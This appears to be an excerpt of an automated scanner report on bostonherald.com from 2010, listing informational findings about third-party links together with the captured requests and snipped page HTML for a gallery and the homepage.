<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Spider-Man musical stuck in a web of troubles');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294372&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(0) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101105/212eda_Spidey_10082010.jpg" alt="The opening of Broadway&rsquo;s..." /></div>
...[SNIP]...
<a href="/entertainment/movies/general/view/20101104new_spider-man_villain_is_good_at_being_bad/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/7355b4_Rhys_11052010.jpg" alt="New &lsquo;Spider-Man&rsquo; villain is good at being bad" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Farts_culture%2Fview.bg%3Farticleid%3D1294372&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

8.9. http://bostonherald.com/galleries/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /galleries/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /galleries/index.php?gallery_id=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:49:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Boston Herald Sports Cov
...[SNIP]...
<meta name="SUBSECTION" content="Multimedia Center" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234" media="all" />


<style type="text/css">
...[SNIP]...
<a id="galleryHeaderLink" href="#"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a href="?gallery_id=10&p=0" ><img class="galleryThumb galleryThumbSelected" src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_11072010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=1" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_11062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=2" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_11052010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=3" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11042010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=4" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11032010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=5" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11022010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=6" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11012010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=7" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10312010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=8" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=9" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=10" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=11" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=12" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=13" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10252010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=14" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=15" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=16" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=17" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=18" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sport_10202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=19" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=20" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportspdf_10182010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=21" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=22" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=23" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10152010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=24" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10142010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=25" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10132010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=26" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10122010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=27" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10112010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=28" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10102010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=29" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports10092010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=30" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=31" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10072010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=32" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=33" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10052010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=34" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10042010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=35" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportspdf_10032010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=36" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10022010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=37" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10012010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=38" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=39" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=40" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=41" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports091272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=42" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=43" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20100925.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=44" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=45" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=46" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=47" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=48" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=49" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=50" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09142010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=51" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=52" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=53" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports09152010.jpg" alt="Photo" /></a>
...[SNIP]...
<div id="galleryLeftPhotoLeft">
<img id="galleryImage" style="border:solid 1px #000" src="http://multimedia.heraldinteractive.com/images/galleries/backpdf_11072010.jpg">

<br />
...[SNIP]...

8.10. http://bostonherald.com/homepage.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /homepage.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /homepage.bg?showResults=1#results HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:46:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 150596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/politics/view/20101108go_for_it_scott_brown_2012s_the_perfect_opportunity_for_prez_bid/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Go for it, Scott Brown!"></a>
...[SNIP]...
<a href="/news/regional/view/20101108grim_reality_for_funeral_business/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20101107/369b895a4c_funetease_11082010.jpg" alt="&#x2018;NOT QUITTING&#x2019; : Gary Dessert, a wood-flooring expert from
Dover who owns the Casket Store, has been fined by the state for
offering inexpensive burials without a funeral director&#x2019;s license.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108grim_reality_for_funeral_business/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/news/regional/view/20101108ts_form_rains_over_function_in_south_end/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20101107/e5caeeddd1_OnTheT_210x45.jpg" alt="ELEMENT-ARY: T riders brave the elements at a South End bus stop during a rain storm last week."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108ts_form_rains_over_function_in_south_end/format=comments&srvc=home&position=2">
...[SNIP]...
<a href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3"><img src="http://multimedia.heraldinteractive.com/images/promo/20101108/913f79de63_bradytease_11082010.jpg" alt="BROWNTRODDEN: New England Patriots quarterback Tom Brady reflects on what went wrong at the end of the fourth quarter while losing to the Cleveland Browns."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a
                        href="/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=3">
...[SNIP]...
<a href="/news/us_politics/view/20101108sen_lisa_murkowski_on_cusp_of_win_how_will_she_legislate/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/cb73f7_lisam11082010.jpg" alt="In this file photo from Sept. 24, 2010, Alaska&rsquo;s Republican U.S. Senator Lisa Murkowski addresses a group of supporters at her new Juneau, Alaska campaign headquarters. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/us_politics/view/20101108sen_lisa_murkowski_on_cusp_of_win_how_will_she_legislate/format=comments&srvc=home&position=recent">
...[SNIP]...
<a href="/news/national/northeast/view/20101108vermont_yankee_shuts_down_after_radioactive_water_leak/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/b2d2ab_vermonty11082010.jpg" alt=" In this undated file aerial photo provided by Vermont Yankee Corporation, the Vermont Yankee nuclear power plant in Vernon, Vt. is shown."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/national/northeast/view/20101108vermont_yankee_shuts_down_after_radioactive_water_leak/format=comments&srvc=home&position=recent">
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/business/real_estate/view/20101108salvatore_lupoli/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b6c328_sal_11082010.jpg" alt="LAWRENCE REVIVAL: Salvatore Lupoli, chief executive of Sal&#x2019;s Pizza, displays an aerial photo of his Riverwalk Properties
complex, where he has started on a second phase of construction.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/real_estate/view/20101108salvatore_lupoli/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg" alt="Robert &#x2018;Michele&#x2019; Kosilek.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/track/inside_track/view/20101108because_sassy_gay_friend_says_so/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b9b0fc_sassy_11082010.jpg" alt="&#x2018;Sassy Gay Friend&#x2019; YouTube star Brian Gallivan.">
</a>
...[SNIP]...
<a href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/c595ca_ltpconan20101108.jpg" alt="Conan O&rsquo;Brien returns tonight with &#x201C;Conan,&#x201D; running Monday through Thursdays at 11 p.m. on TBS.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/sports/football/other_nfl/view.bg?articleid=1294845&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101108/stp/590145_aaron_11082010.jpg" alt=""></a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1288456&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordan_177x57.gif" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
